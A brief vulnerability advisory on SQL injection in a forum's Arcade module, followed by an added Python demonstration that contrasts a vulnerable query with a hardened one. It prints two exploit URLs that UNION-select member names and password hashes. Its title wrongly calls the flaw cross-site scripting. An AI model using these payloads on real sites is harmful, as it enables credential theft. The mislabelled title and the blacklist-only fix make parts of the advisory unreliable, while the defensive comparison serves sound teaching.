Validation Hole Permits Cross-Site Scripting Attacks
A remote user can inject SQL commands: by supplying a specially crafted input value, a remote user can execute SQL commands on the underlying database.
A demonstration exploit URL (I) is provided:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
A demonstration exploit URL (II) is provided:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
SOLUTION
Filter the following characters out of user input:
'"!@#$%^^&&*()=+
Source: somewhere on the internet
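The flaw and the two fixes side by side, as an added example that is not code from the advisory or from the forum software: a sqlite3 stand-in for the arcade query, with the advisory's first payload cut to five columns so the UNION lines up with a constructed table. It contrasts the vulnerable string concatenation with the advisory's character blacklist and with the structural fix, an integer cast plus a bound parameter, which is what a practitioner should rely on since character blacklists are fragile.

```python
import sqlite3

# Constructed stand-in for the forum's ibf_members table (column names from the
# advisory's payload) and a hypothetical five-column arcade category table.
SETUP_SQL = """
CREATE TABLE ibf_members (id INTEGER, name TEXT, password TEXT, legacy_password TEXT);
INSERT INTO ibf_members VALUES (1, 'admin', 'md5hash-admin', 'legacyhash-admin');
CREATE TABLE arcade_games (cat INTEGER, g1 TEXT, g2 TEXT, g3 TEXT, g4 TEXT);
INSERT INTO arcade_games VALUES (1, 'pacman', 'x', 'y', 'z');
"""

# The advisory's first payload, URL-decoded and cut to five columns so the UNION
# lines up with arcade_games; the trailing /* comments out the rest of the query.
PAYLOAD = "-1 UNION SELECT 0,0,password,id,name FROM ibf_members/*"

BLACKLIST = set("'\"!@#$%^&*()=+")  # the characters the advisory says to filter


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SETUP_SQL)
    return con


def arcade_vulnerable(con, cat):
    # Raw request value pasted into the statement: a UNION in `cat` appends an
    # attacker-chosen SELECT, and the comment swallows the ORDER BY clause.
    sql = f"SELECT * FROM arcade_games WHERE cat={cat} ORDER BY g1"
    return con.execute(sql).fetchall()


def blacklist_rejects(cat):
    # The advisory's fix: refuse input containing any listed character.
    return any(ch in BLACKLIST for ch in cat)


def arcade_hardened(con, cat):
    # Structural fix: `cat` is an integer, so enforce the type and bind the value.
    # Anything that is not an integer is rejected before it reaches SQL.
    cat_id = int(cat)  # raises ValueError on non-numeric input
    sql = "SELECT * FROM arcade_games WHERE cat=? ORDER BY g1"
    return con.execute(sql, (cat_id,)).fetchall()


def hardened_rejects(con, cat):
    # True if the hardened query refuses the value instead of running it.
    try:
        arcade_hardened(con, cat)
    except ValueError:
        return True
    return False
```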